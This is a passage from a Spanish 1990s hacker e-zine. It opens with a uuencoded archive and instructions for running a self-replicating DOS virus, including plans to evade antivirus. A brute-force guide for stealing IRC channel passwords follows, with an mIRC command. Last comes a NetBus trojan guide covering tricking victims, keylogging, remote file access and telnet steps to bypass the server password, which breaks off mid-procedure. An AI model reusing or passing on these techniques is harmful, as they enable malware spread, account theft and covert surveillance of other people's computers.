M*87(Q^32B1F)KWG&BD2#;/&6#*QPU!E:31?T:;55[0!R3=?F+KXAK7./05;B ML65#>G&P<^2Y26*FD6=R'#!S!I<C+@BS/:R>MW)H\6^11)@Y\KN,'0-,;OU! MO-^#N>PF2W*]K"<L.YS?6O:RZ.FW0\+^EDQH(3Z`8^^X[Q&9&NP>&,8F+7#E M?;8_R>.M[^)'MRMS3L%.*D^M_QL_DR+P%60J>.G0O.NB\$Q#D$@TF)@H&O30 M>8@&P>+'.8IX#?$QX^MJP)`W'F^\]7EKZWQG2GUSM+*1]S15B/2(K=?1!H^Z M`$;=W",`?^A=A8I*-^_*X9RH+]]^J;#J(A5'>'E9\!0YD9-"S+[80>3[%T2U M:9WKH!A,4EP\/P(88=9K0(/#0(\/=$'`@,+`G^5WXQE*#+1RW&P7ZZSQI@2? M4)D!:[4"/]:%]A7V]-(:U*P]L>GS<`X7180H`@OH`D'_6FP:!:1K^:TX=4K* M.I$D?3^L>]-"568!\P7XEBJ>:CVL"EQM*5"_1XV/MI+M>T7.F:Y;78^B5Q]Y M5A;&`D_+,L'%B_Y"@N0'#BP,YW^KXB4E#A!=FN'!.>(60$5<8PK%1XEK#*06 MVFWW`#V;X#2$A5?CB@6XJ'C4;=-P'H27AW_>]G4(KT4,,IMYS"**+;,>5/G% M0F4)ZY9SV0YVD5.N[`-V5KR=+;(>-5%.0^&FA%,6Y>!H2_"_]J3F#/L/TH%J M+:G%[!BSQS=7Z[89QERTH>+COBRF\+WJL)396^!37][.0RB+[[@6OMB#+&=> M.4UW6$^Y-Y6)/VHX8!&IH&SK-Q[V=3X++C;C6F_T$-HD5Z&>VN;ZW,$<\FM[ M)E6.XW@G8HLY[L%!RW<Z+3:N?_IX5CL.TA+QE?B2,!B%Y^#7SXUI)9P)9<1A MDO'UG-71!FE8\K_:/&[GY^$-?$Z,>G6^9,?L&2J&H#\+GP#%68Z;I!?K87:N M:>UL<$'O:XH#ZP0%3"$H-L._NV4.I,`H(+TX/<%\XEML7"M:*U!8+2GHKJ4W MWQ?3@]U)^7ZN*3&NC9@7Z/+DZOEIP@B7[7HA0^;+A8K9'L7^&\72MNXYL\$: M0;]A+HDQI8!=5H%M#_R*G?^OM2&K";(-&/[3A6%@4@II<+,G%HD).H4P)R82 M['@VBL015`UEKZ?1T&XS6N@Y.EF[1RO,AZ=U3\\&L(%757\F"Z:6?;XC1+H^ M*VM#M\91?%:ME((?@\-89P5R<B,@!N=PQ1=,F>HNZLC4B"?-,#5NU;Q/HL\0 M41QBC8VZ2-_76'B6*W$Z#W3G60AC9<:A1D7YK;-9+$'6Y\TSB$A^F+&$\*EF M:W69D`6-T'B'ZIV,<?7*4$,0J;=C@<<_-'A+#:BO%5X39.=$;S*"9L1`IW<& M&=J^P*M^!6K6-Q1(!4;6J6&+*@BT";ANS'C(28]6752#;EP>]FE#?;9Y,H9N M&'7&S*//_3A3/K$8[93?(90.+$^+VK6,@C,/M0&;SYUU#0T!<S!H*8(SA#2I MK:TF!27;UHEN)L4P[8EMUGE&9S\,7"H"<"NB7=^X6`^;\^%AI(!)6GU(0P3S MVA(%V]X7L^W8J;:NNH(U'\JR6="_*GZA2M='&6<JX-%HE9*YQ=%]-1G9KF3! MF2]V_A)UZ?*Y0PFCG*ZSH6$E<LEFK7Q"DR"7;P0:ZG*'Z;9E:ZSRB0/(ZF>C MILE@'4&GX0A/'0@F)_-V1TGY[:'M<?0%\4`:G)2E!BYCO()!):D:Q?*GT@^, MDT?6UP`E'L^>W]?H-$^2ACA+=VYX!0-70=&A8;N)C'^3V4!"ZY,,U%`%,!K* MN-TA&MRS@*A:`,]QG#__[N8EXR&D=21`UDDEQF/%IB'.0,8G&Y"=Z0;5Q/M_ MH)+JD%JB>+RYP.&?>4,TUVVC<NYF";5$R:[@K["O..;EH!$^<"4>6TPH5Z/A M\JOV`WQ,2(O8<5)J$3O$7`SNH9.OS\6_497[.#E20_B>.A>\R6F*2M3"/?ZS MI9?4%A2V5=>?(QD>)B!KQNB)T"FDYMPHUC-(X#M*&+(SR!.0N=I"9A]*=_<\ M_%:H26V.'5_QJ&C)`Q"'3+P>-NZEQ[C$B:-"EHDGFI[AL16G^9O00GHM>CN[ M.G"-.-^JI0N$R)5<(1G:[3Q!(!8P1>AW,V'87!%,*IJG=FN&"F(KQ.O$-_93 M#D\7CJNS;W6P(=ETE^ZGA.)=#5J^-]6J9;H1I&Q(VZQ#HF.[#)?'@/VJUE2Q MMC6A-SKL<HZ+_T$;3J/IYDPUV'(;`PECBXL1'+;FW0TWQ7'K)DBM0>H@>B;) MI9#6(MREAO>!?I1Q8T:"B!PY%(D,A$GYR=!Z=14^R=8";(?!AZ]&UP'#R'EM ME[_JT6>"WR!I"GEWLCXRF=@W`6:[_S5PF[7QEW@B2R(E7<&1.]AT;X/?#DF( M>H'':L]IK?6J[ZXT_."^(AXR?.\1XM$Z2>BA)R\@MF,5'W*K6MXCY]'PQ6\< MIA+)@H?[*W"OHQM&?Q;,>A4<F!F=?R$,%D^,:K,-`-/Q)P]L3\'GMZ7S3>!M MR22\=,+7BJ&,=Q=^/O=IW!<^[H_)^:6NIVS8]F_34*1[K5>X@00>!:$IN!E] M='*!9&)]T05]-U,BCBZVJF306I(UE+H![<]NVJJ%R\,X=I8ID8V6\GJ2U[G] M(%L^[<*,&EX+>*-Z2ZE_>73K_2UU,)?RY$8'ZP;F)&"/7\[A<=<[CKIMUJ`? M>CR2,.$IQOY47.[2P]`7K,WPAE8M?2[JZHR!UVZ8B\CBYG(2#,A2GEIZE%=J M7BP\>-'?D84"?\%7,N>UM&NL5._9`O@P<Q<W2QWM,1-TJ"-B>=<Q8'85[ZL) M-STCQS)KE)G5@V'0UE)A+'Y"9=AI3'7ICQ,&45:26<PY7UV6G+$)":`'Y;.V M2;T9C=S.ON.J=^K=[J%#\IPKR[@-!%,`4NK[6+)S-AY,3S!!6_Q,%?U`[UVG MQH)3.;K+\MN&#6TJ/A."FP-#R6!S*`FW:?E<-G;;YVNZ8+"'CT?\.Y[L>'8A MP_N7T@SID>V!S+)U4M89?RN6YL2C6;-+ON-9J2N3LLGR0`PO]VL"1;$'*MTG M%1#E&XN=,;1<].Z^SEPYJ"8:\)7Y0/V1\*B,Q<Q"C28MM@(5A?TV3U%^KVH^ MV+N@+$\)-5)!<AED5$")(2[ND$,C1$BD,9U`<%<Q[GI]:0VP.)]<00I'DB;Q MM3?NH?9D#AK/#IDZA9NKYW*!JR[!$0&.=P'D7VD!PC0FB;L5A$P@\`ENT\DW MW]H^!<AJ>?K93V#+&#_(_"(&/@T%&(3FT^]Q!S)ANDW/67*(A/\N%",;9EA6 MDI9LH:4*6E1`,")TB$H2`JLR+.]?_/3`^W7-VX,58=Q['%_*)S%>:W`J&A8R M$1P]<,L:,RYMW,07U\=-'`<G[P;CKC/HG,1QX70%F:)^:A":*@BX\EQD`L=5 MEIT][W$@.&%7R,'C58[Q!J(;%_5DWG;]K*G)5>A:L;S)RU7D^I2Z)&&,RZ.N M:G,+F%4#\R!,<O\+Y^+BDO+7W&77T(_,V=9UI?IX`5<VR4IFR,):7"F9P:UF M8B$3ZS+K:=^1L9:,U-`5![^8CD<&!DQ<BT^$#*]WR`FP)F$#,/*S"'O<^FZE M0H+\>#^\:\H&J/4+U?5?!,7%K0WGR0H:`?F['S%_9GE&M5IE1V3O>D9_LLTR M?>"W\&VP9'ON%&09A#LU**\BVGO<)9]/+_4ME`?=F-31@LCG'HJ!Z?8.YO4A M[;V#]Z1IH>UJIS^XPN>E+H=<@@YG6T"Z9Z4Z?EYI>,SDFUMJ$M">W@&I)7B# M,]CP42]'K;2=<OZ/7]774>^K>KP]E\XA#A2.N_Y\]B`G>6J]&$<:T!I\4*1Y M4H-JI,;-U67--T.O5`T9P=HH\PJ2'BIT'*Q.+21$%^YN<FS<=MB>571[>OYD M-FEL6^QR.S!\.0-+B_]=T%;VYTU%H21MWE]](,TYK3.O+@5Q#NUFD;0PLNZ9 MIC2*&T6-@T9AD_>"E\7?I)DXZ=H=#!OH?Q8%:-U<N>Q5\=0``6=X-F='1+L: M]-'7JYX".+:]E+<O1RGLVD8\W+AMEKP`1W"YT,=T52RXJE`;J*IS$3HR]N=2 M?%._V1T?V[&?*][I$;\[]VGU5TY4-M&2?`56YJ*7_76*:&0;BXZR(]XM56\2 MMK@*A;O/TVNW^=Y'LECIZHT!7'RPA;?X\+T87B9:3!AOG"MYD@VL^2W.QRF& M!RP=:%\+`(J)OCFG1[;_.\5&NP,#?,Q)7W"98I?&(08O:4\K\!+$>8&\^\&; M@*,%.LW#J9_5#]C[<6K#W7PH-</).$SIX^LNM3I+(N]Y@^FRN!S>A&"C.'?[ M!&@"F,!Z-*JE><[?5G)D6Q%,+!T))P\]W*SV2ZHZ[\24<U[NH+B%D(%?EW&6 MSL!*R\.:ZV.#OU6A6[)R_(^H<K4AV9Q+LRH&OR`7Z556YS%QW,5B]PF<G]>. M[47$XM;K;<$?'"ZIP)8''U2I/<M<>.H#4TN%/-X=XY][CTY4Z]%F3U8P+23. M&NOP_%[ZG:?2[V8?>>G,T\;<UM.JIFU%$8U"IJ5R$2_E6*@S+`'-/X#6?6KH MA*H;/ZX"3F#O(=5>N>*@2H4>+'G51'Q'?*.Z'OP<[`Q9_W%6`L^8\C2AO]UH M&._\'VG2-SWH`!6>JVV%13U6C^G%.L]`;$R2CW.L6,<O'TMBC;I)%YQ\VB'_ M6P30!KO0*7`00.+7#R(&=OR+8IPW^D_>UK]2?:^0"'.!X_0X7HWL",=3T/*L M"L*T0%<+/YB?1:PPB`LJ'2)9Z+[5GQ#F8_VF]7_>;`;?SHSFW[`81H%W:$]Q M-/7V@D?$S[X6GLW,K/4H&J"@($M//G]/Q%1VU>:T`N-]X>':*=G<GC_9_^S, M/^[*Q9VO?%:Y[H)MW'U9I\)IBZ.XT50;]1URK)'=9TPXMF^<:-6$2?Y'_VM] M=DEW@%-LF\H5=P2TU5$RL@OG6<^I6'6-C7?9/Z7`1>/%8W[CY()&Y@8O:N'; M6ZN+D?#Q?C;!QM4)T.N]YXS^7$M*CXG=DDW2!83_3[\)D"^I=A:_X=9V"_[% M"+N:'$45R(^%)Z/;59;T\QLZ5;L^DBP:N%V4&!=0^;@;S^_Q6.2;H:PS0NOF M6#;YA>X*$KM4?U!5@1IG97QLZ?B:A0.$`*5D6+F0JDL_L\-_K0"OJ!2F$W-N M*60N([_5E]A<"*-0C'(&O_8E7D2+YTE\D@5MOIJUPC11Y(S?-[PGE,L;@L/2 M]Z'0"3\Q[1L1QN&HZJ`_<6]NX,U1H.'&J&^<-+WC%BG(,^DM7^'(R[T-T6'* M'>I]J%*2HSY\*P<-$]7L&1K#?]D-]XS+NI\&0YGB)P&4>/#?MNU!1C_U_E4M M21=3?_<F$O-G>\/76J6%+]_OGB@OD$L*\7Q?GLB89!H.+"\:X>-TTPYNW#!6 M++CHC.XQ9N@%72.DF2IMX,[`;=,=L+GL?J_3MM`:_.K`ZVT"J:;W9R&??2D6 M5,$!;S=GWP]!?K%G`ZD%#2-+432&1>"+35K#HQ?-H&D!G??-..'ZWP<J"-*` M[Z@]\RD>=75>;=!1B8S?/(_MC;@Y\0D>4WWW<.HG65XIA%?"/369]HMSD%_0 MP]IRST.]*)#MR29Z;",L:BFT_[N\CVK74*YH2YS/P\S2&W;(,B4Z].*]%O69 M!5YHUK;\7JHZ#Y2%?:^&/Z%O"J[0KYPA_2<-=37I*G\-,>F0D;E;=MIYS";[ ML25R[\%BA</\85G(@-P(-FXK.);W;[?)?51M\7B76CQJ*7=EG8O-.?`H*$3U M`:W:C`3U4;MM'RADXM-8]X\L_0XF,63IF9M-EK$N_<R&WD"I^]II=$96Q,/A M<ONA]7FK?:M^`;)<(S&+#.+`R5F2%P'_&<YL>L"27G"]1>5TQOF>4"^M%_\F M#&@[-)!,8MS:40JDQ%`#*"WXY&;5(V[E%?I!3Z]Y9U?_0M5OEXV)S1"=C0^< M\\C)(IMA4D*@!-P,<JCM1_OD'N2YEOB(F%*O7[L.S7:LPQ6_?S8H^LK<X]3Y M^6H_.G,X:V+DQSK=Y0`1PEZ+K*P%0%>=]A1<QTN:E&^Q_`^W-\U=I7SA+^?= MMQ_^4$6VQ8F\FQZ]87T>]>'3.J-?;-:\?Q7;0$V9P;-;J*;88??H:;M9F?]` MA/F.=YLV)V"[75>S:>56OM_6&:'#.Q=OAUHFHVMF2GL^'JJW9X%M&V]%MIWF MN%='4DYM-G!M51\)!GI"WVT:@.B3>GA_1H_MJSM'MO?;M>#KFZP@;%Z<9[FQ M"$,3:U*XP_(O?69NE[4D7I2\1`/GM9*K+%UJ-\[2?IVJ?LC'T(>*NM%2]>BF MVHZ+GP'P?$WZK\^TV,;#3TE64UBSBP\L&7,ZHFNP-$?V,P/(&C,M)Q??7+V4 M"QW$ERW07BP@._4_3(#6PXE0Q?/-/X[B32^>\7-1!VX7!`)7&BG##Y-M>N>X MH)5`+\FI?,X<YEB;31;T'#&7]1WV?!(:I5!<-&>_0APUV6^UCZA!;FZ_6/8" M.ASYQPCW?-LH!H7#<TM=+/\."C<:3,/N98BM`8&L+T"0;2=B?`_*!TT107$0 M>T7PEP`.!NQYP2-CQ=M0/5)3`/AOV1.FA8X'+.HC.X$%D^S7OA\,:$*`(2,Q M1$J<B/_4EC5":'X136,F#0HKQOK#I<Y_?/SKP2=:2]+I$V6K.'?4<*NV<Y?C M_!=6LZCTT@F4`WPG6SZW/2QBU_ARSQ/"1'B3IKJGYV%^PP\HC+1#MP]+;%%Q M>S;EC+E^`O9)<,YSYQ90MA*NBA>&Z9I>V(K5Z[E3!$N>(E'JN`V^N\;U9W!A M^%)&U%5LZ`!+N7[LZS8$N24MENQ.2S/O-1?=H,*/492KD\?FBN^I&TUC\D(] MEKUY#CQV9`_V>IG>K4I=HP)@F1X]%L'"QV26=H8O.^]X],Z6X=B*5J_>:.G> MM1F00]IIS,_OW'ATP?=7*^<N1&PO@<U>NX(/SS[S-)J;D)S\4;W9+UN66_8! M]2]W)PB+9/[UOCFFB9C.Z.J<WT>/;&#?@?O#F]<[9Y]A?\V)[5$[*F%Z)-[` M!\B.B\;QLN`SD7]$F['/A@[83@-9B4&4E3(Z?K0O3_`A[!;=*4)KVP3=)#!@ M+F>S42;J?6QV?]G&R0C;SZZ+ZX#$=Y'3."C,H>2;9W\_+?=ZP)]&E'<H(KV+ MWTJ`]/UO29:'$\>BWHX0_0;9PM$>$`""JQ42YJ8]V!BO,D`9H3T45X&8"UZE M/40?N^J%II4L[U74U.`:+`(PA^WT@&[V8.LT"%L6CQM<+`N'I4%&^ZI.4T5P MY7YM:@1@O?<F.J\)M1<9).#B.O64*6GP.I0W:D3<R'X%J;\1LGBSC"FQ3XF] M4]FOP5V6"YHCF(:4O$/#S!R^MNS?HT,O6:VA=X,M:%PM$2?3`R,1:N`%'V;& MV#.F;+K4R]N0$A%H?_1.X!QZ)WZ]QPZ$<8?WN_4)[E7PZ9\60"D/`VR)]AB3 M4ZE@)E'*\C[BK?ZW4O,,T3P/-F.4=`TO+2VX^P^0%&B#A_N&F@DLB#DQC!@& MC1722\^TZQ8U#_,&G^[8=Z4\9=ES#P`(,-5_DO\&_Q3_8_YG_=_[`X#*^?(5 M_I%R2BZ5>\B/R('W]`"'W#>@/O`*/,=_RR\E_O;TX_!6;<-QU?3V/*2]-!,G MCLQQ.Z&**/M%LF6J]=AF7]3ZIG=Z9P5Y'B3=M<<.E)+TN?2Y$ZO[D,'W=L/( M#*\;V=@S=Y':MMI[L1UZB0P:>G;E@FX8*QUN''[T,D;/^D&2;X?IVT`LO4MW M?./_N]T/NNOC#380^K$G73Z%MJU^-ZU_\N?76M3P:"?M%_/`5*KHX=;SJ6]F M=0`(D+PW]$S<Y*43&SUB?6O"]1B39';YDT'B.R:1G;[5D@"Z'.Y?O_XF;H[V M8V6QT:A<*J+O,WG@I["H?2XBTPZPSTVXSQ(^C9G[(B)H1@?G%!OG$4>KQZ$' M(8,3PLO6;I^,#)L-DOMS(T$&)*8Q'SW4`?&L@!Y`^LPSO1_0E7CL@X.Y>K$Y M(3,.Q9K"D;5X1S<NUEJ_Z:"C>8)^/44WY;F$(;-\0J0J<U"'V=?#W'ARCGB. M\M>4L71"KJ=QB2XZR,'%$Z`4\2<W)&P#^NVH'ZT2W&N_-HE72BJ\Z'&Q=PUO MF85OI)G^C`7S87PP]]:#SUW4;W[H(B9-*+61R#!G[<#0^;ASA):Q/M\;.6.& MJYX?>6@!LUU<5%/O>6_:5]O4@NUZ*7W;;!WY+#7A16HSCWQLZK!W=,R(Z]"' MCIX[VFWTQO`&N3D-1D.*7&4A(:6OD0FT`QG,E#F\M-C$NE%='72C]EEB3K(K M-X/?&__$SY=GU[0?=]!"68')AA&)O?52"1/HD,]V"(RE4>VF=B*VIWP\W0,U M]1J<EJ235Y$.\XF_S*PO2='#"\VSX-`K(>X`U+PRKX63S*[T3_0#9N2V7GBG MGMY6^'$`1>_53Z!0M2J2=LJ@-\)79F"F1XN&B%+$J#Q#@-A+.F&Y)(HPLP2S MR7)$L;^'%2TURDL<+#Z-J7M_;\8L(TCG@C^_NK4>Q>O"T>UH?7CX2&+VW:,P M1W\6;D[8%6[?,J(Z`O"C$43^$7Q877M^T\U/Z>C)&R"E1G/2F)"F1$@/G<0_ M44D[CE9*.HM[5QI?5A;#V=?48.329P\=U,VDG^!^;KR<C-?8P?WRIBW_W?1J MTQTS;#V2S'B"<IY.S3AOL/#>72!0RQ$TCF]@@MD_CCKKDYI(K`!*KGXH>=?K M"L#AC#"YW@F5Q\TT\(QQ<@-FA"6"_@Y;PYUBY%+X%CYZU+<V/!FY!Y&&9Z&L M[D_ZL=D]O->H%9O+@.D\'+W7X^N'0_H^/5`%C:$?T@^Y8]+H>O1=0\(^*35) MV1"U+U;)!=<9.UT`?,09IR:YI_#P+Q6`#^49=!^JH56RY-!0F0I?M?ICW1(` M1D3QO_7R"%G2*MWR>2L7:,&(9*Y?GIVRI&S)@A*95%&BT[F+R,0/5_*TVA7S MELM6.RW2S5N!:1V>*Y:LG*=?LFIEC-X7>$//PY^'(Q*%5I.1E;IQZ@?:Q%S% M?J)L;+A),3^$'I_RT>R5)1\NDFG7PROGS5^R=^5"V9`L57TH-W=J;HQ,8]%_ M`V=NGJ>SKBC1!Y7F;QIU"Y(EZN8O;E*V,2?.-2E6SM\7,&^!`.P8'50Z&@1% M1*_Q#R1YD6OP^8`L,2QOW%YJ,UPNG[\\MQ@/A]SF[LG*GIJ7&#->UFA-?K[/ M9X6U5+9K]MKEUK,R:-K7_I",!T'JX54H!$.2&9.E$,J'5JR3>4`C8O;5W;XR M4`9]P$O]&B;X,)`&AW6^0<E'EY9#T=0KD'[T#96\[JO=*8_64$G?E+R#%E(0 M9YA%E6%4-49]=LN`40<PZB1&S;K5A5$W,>I/PQF,ZL<H7(52;D=8C`K&J&@L M)IW28%2!"I+!\)4,U`I;.1<(J-%L]8BP2^5]H`7A@3NJ(0&$[YS^2)*7@ZX7 MN\#PWR)[S#BI*^;"N6$2&"G`1I5@^&(G+B#`Z;-V<@P7CSG!'\<(H`"!%J.` M8J5A^?*0@XGSI%)HQD5L-BQ`4"D?@T;E2P'DY.YD'#1`/*F;BPCX2C&*=()& MY#=<ZDS^1R#F2:1"()L`H#O<_P!02P$"%``4``(`"``/AN$@]3K'G2H```"E M!0``"``````````!`"``````````0T%:02Y#3TU02P$"%``4``(`"`#``5<> M!2_T-"(@``")(0``"0```````````"````!0````1DE,14,N0T]-4$L%!@`` 2```"``(`;0```)D@```````` ` end === UUENCODE end 'utils.zip' === Hacer lo siguiente. Copi is el archivo 'caza.com' a 'caza2.com' de modo que teng is dos copias idénticas. A continuación ejecut is el virus en ese mismo directorio UNA SOLA VEZ (que si no infectar ambas copias). Y luego ejecut is 'filec caza.com caza2.com' y podréis ver cómo ha cambiado el host. Si acontinuacón ejecut is 'caza.com' y volvéis a comparar ambas copias veréis que ahora son idénticas, el virus se ha reproducido y las copias también se reproducen. Cosas que quedan por hacer con este virus: i) Tal y como est ser muy difícil de mejorar, dado que los saltos condicionales que usa est n al límite de su distancia }:)))), así que el que quiera seguir trabajando con él tendra que meter toda la infección en un procedimiento y dejar el cuerpo del virus aparte. ii) El virus no infecta archivos protegidos contra escritura. Debería cambiarse los atributos del archivo a infectar y restaurarlos después. iii) El virus es demasiado evidente. Salvo el SCAN (X"DDDDDDDDD) todos los antivirus que he probado lo detectan. El TBAV salta unos pocos flags, aunque son todos muy f ciles de evitar. Adem s falta un adecuado tratamiento de la int 24h, para evitar problemas con discos protegidos. iv) El virus no saltar nunca de directorio, a menos que se meta en un directorio del PATH, pudiendo entonces extenderse por todo el HD. v) Cualquier antivirus residente lo parar . Todas estas cosas las iremos evitando conforme mejoremos el virus. Allí donde consigamos ir un paso por delante de los antivirus mejoraremos los antivirus existentes, ya que es ese el motivo del curso actual. De momento podemos tirar el SCAN a la basura y confiar en los dem s para controlar este virus. Bueno pues por hoy ya es bastante... creo que no he metido la pata en nada de lo aquí expuesto pero si alguno ve fallos que por favor los comente (la verdad es que es f cil que haya metido la gamba en algo :??) Dudas todas las que quer is como ya os dije este es un paso importante en el curso y el esqueleto aquí expuesto lo usaremos de ahora en adelante para añadirle muchas mejoras ;) Patuel. [[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] %%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%$$$$$$$$$$$$$$$$$$$$$$$$$$%% %% Hacking a Scytale %% %%$$$$$$$$$$$$$$$$$$$$$$$$$$%% %% by []KHAN[] %% %%$$$$$$$$$$$$$$$$$$$$$$$$$$%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Lo primero de todo una corta introduccion, Scytale es el bot que "controla" el IRC Hispano, y como no, el cabron que se guarda en una base de datos todas las contrase±as para tener OP en el canal que quieras. Si no sabeis lo que OP o alguna de estas cosas, yo no lo voy a explicar aqui, para esto partimos de que teneis unos conocimientos medios de IRC, si no, mirad primero la RareGaZz 9 (GuyBrush), la 11 (lobo) o la 13 (CyberDan) donde se explica basicamente lo que es el IRC... La forma de hackear al scytale es sencilla pero lenta, que yo sepa no hay manear de bajar la base de datos del bot, solo un ataque bruto, aunque como todo, seguro que se puede, si entras como root por telnet y sabes que ficherito es, pues lo bajas, pero aun no se como se llama :( asi que explicare como hacer un ataque de fuerza bruta, se trata de hacer un programa en cualquier lenguaje de programacion (en el mIRC es muy facil) que pruebe contrase±as de un diccionario dando nombre de canal y nombre de usuario, pero CUIDADO! ahora controlan tambien que mascara tienes, es decir, hay varias mascaras: No pasa nada con ninguno menos con *!*@*.server.ext entonces nosotros tendremos que tener su mismo server, si no, no podremos, con los otros tipos de mascara es facil, te pones su nick, su host... :).... Estoy haciendo un addon para mIRC que va a hacer justamente eso, si eres creativo y te gusta la "programacion" podrias intentar hacer el tuyo propio, no es mas que un programa que lea de un diccionario una clave, y luego la guarde en una variable (ej. %pass), en otra variable el canal (%canal) y en otra el nick del lamer (%nick) y no tienes mas que hacer que un: " /timer1 0 3 /msg scytale auth %canal %nick %pass " y a cada intento que lea una clave nueva, tambien quedaria guapo que controle cuando scytale te da OP en el canal %canal y entonces mostrar por pantalla la clave correcta y un /timer1 off para que no siga intentandolo... TEN CUIDADO, EN EL IRC HISPANO COMO EN CASI TODOS HAY FLOOD, YA SABES, MAS DE X LINEAS EN X SEGUNDOS Y TE VAS A LA CALLE ()------------() /\/\/\/\/\/\/\/\/\/\/\/\ <--> []KHAN[] <--> | khan@cyberaragon.com | ()------------() \/\/\/\/\/\/\/\/\/\/\/\/ [[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] ----------------------------------------------------------------------------- _/_/_/_/_/ _/_/_/_/_/ _/_/_/_/_/ _/ _/ _/ _/ _/_/_/_/_/ _/_/_/_/_/ _/ _/ _/ _/ _/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/_/_/_/_/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/_/_/_/_/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/_/_/_/_/ _/ _/ _/ _/_/_/_/_/ _/_/_/_/_/ ----------------------------------------------------------------------------- _/ _/ _/_/_/_/ _/_/_/_/_/_/_/_/ _/ _/ _/_/_/_/ _/ _/ _/ _/ _/_/ _/_/ _/ _/ _ / _/ _/_/ _/ _/ _/ _/ _/_/ _/ _/ _/ _/ _/_/ _/ _/ _/ _/ _/_/ _/ _/ _/ _/ _/_/ _/ _/ _/_/ _/_/ _/_/ _/_/ _/ _/ _/ _/_/ _/_/_/_/ _/_/ _/_/_/_/_/_/_/_ %%%%%%%%%%%%%%% %% hecho por %% %%$$$$$$$$$$$%% %% []KHAN[] %% %%%%%%%%%%%%%%% -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- Aqui hablare solo del "NetBus", el troyano mas mejor que hay: No creo que haga falta explicar lo que es un troyano, supongo que todo el mundo sabra que es un programa que se instala (oculto) en el ordenata de la victima y hace de servidor, mientras que otro usando el cliente puede controlar remotamente el PC del que esta haciendo de server. Pues bien, primero hablare del netbus, que para mi, es el mejor de todos... En este caso, el fichero que infecta se llama por defecto "Patch.exe" y ocupa "472.576 bytes" (472Kb) lo cual es un peque±o inconveniente a la hora de mandarselo a nuestra victima, ya que tendria que, ademas de tragarse la excusa de que es cualquier otra cosa, bajar los 472Kb, que con las conexiones que nos ofrece timofonica es algo que puede llegar a ser dificil ;-). Una vez que que lo ejecute el programa aparentemente no hace nada, aunque internamente acaba de infectar el ordenador y sacarse una copia a si mismo en el directorio \windows\ (o donde tengais el ventanukos). Es el momento de soltarle una excusa patatera para que no le de importancia, entonces nosotros cogemos nuestro netbus (cliente) y donde pone "Host name/IP:" hay metemos la IP del tio o el host, se le da a conectar y ya estamos dentro!!!. Ahora hay un monton de cosas que puedes hacer. Algunos detalles son, por ejemplo que para sus conexiones por sockets utiliza el puerto 12345 o 12346 (el 2║ en versiones viejas). Que esta hecho en Delphi (supongo que 3.0 client/servre, la que uso yo). Si tu estas dentro, sin haber puesto contrase±a, luego entra otro y se la pone tu no podras hacer nada, te dira a todo " Sorry, password protected ". Y lo mismo si lo haces tu * Server Admin --> Permite porner contrase±a para que nadie mas pueda entrar a su equipo (a no ser que haya leido laultima parte de mi articulo donde pone como saltarsela xDD), cerrarle el servidor y hasta borrarle el troyano (por si nos arrepentimos... xD) * Open CD-ROM --> Como suena!, le abre el lector de CD, luego se canvia el boton para cerrarselo, cosa que tambien puedes hacer automaticamente en un intervalo de X segundos... * Show Image --> Si sabes la ruta completa a un BMP o GIF en su disco duro puedes ponerselo en pantalla y hasta que tu no le vulvas a dar al botoncito la va a tener en pantalla molestando!!! ;-)) * Swap Mouse --> Intercambia los botones del raton izdo/dcho * Start Program --> Ejecuta el programa en el servidor que tu hayas puesto en donde pone: "Program/URL:" * Msg Manager --> Muy divertido, manda la tipica ventanita de windows con un mensage y determinados botones, permitiendo un cuadro de texto para la respuesta, luego te llega todo lo que haya respondido. Con el peque±o bug de que pone defecto de pone "Suprise!" en vez de "Surprise!" xDD * Screendump --> Captura la pantalla del servidor y te la automanda como "Temp1.jpg" * Get info --> Informacion de la infeccion, n║ de conexiones, directorio del troyano, userID... * Play sound --> Pues eso, le ejecutas un sonido * Exit Windows --> Puedes resetar, apagar, canviar de sesion... (las opciones de inicio/Apagar el sistema) * Send Text --> Hace en el ordenador de la victima lo mismo que si el teclease lo que tu pongas en "Text to send" osea, si esta en el IRC y tu pones "soy una puta" pues mandara a la ventana activa ese curioso comentario sobre su profesion * Active windows --> Puedes ver que ventanas tiene, cual es la activa, canviarsela y cerrarselas * Mouse pos --> Le mandas en puntero del raton a las coordenadas que pongas en los cuadraditos (x y) * Listen --> Todo lo que el teclee te aparece por pantalla, puedes hacerle convinaciones (alt+tab/tab/ctrl+esc) * Sound system --> Ves como tiene la configuracion de sonido * Control mouse --> Adonde muevas tu raton ira el de el * Go to URL --> Lo manda a la web que tu hayas puesto en "Program/Url:" * Key manager --> Puedes hacer que le pite la speaker cuando que pulsa una tecla y/o desactivarle teclas xDD mola mucho! * File manager --> Te METES en su disco duro, puedes subir, bajar y eliminar ficheros -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- ┐Te has encontrado alguna vez con un moton de gente infectada y resulto que todos tenian contrase±a? Pues eso ya no volvera a ser un inconveniente jamas! gracias al maravilloso limpiacristales que.... ups, creo que me he salido del tema!!! (tantos anuncios cutres en la tele....xDD). Bueno, pues eso, aqui explico muy facilmente como saltarse la contrase±a... ííY FUNCIONA!! Logicamente, cuando ponga lo que tienes que teclear, lo pongo entre comillas, pero tu lo has de teclear SIN COMILLAS, queda claro?? 1.- Haz telnet a la IP del tio por el puerto 12345 ejemplo en mIRC --> /run telnet ip.del.tio 12345 2.- Te saldra algo asi en la pantalla " NetBus 1.60 x " o la version con la que se haya infectado 3.- Entonces tu tecleas " Password;1;xxx " (mucho ojo! las mayusculas y minusculas son fundamentales para que funcione!!!!) 4.- Luego, si lo has hecho mal el ordenata del tio te dice " Info, sorry, host is password 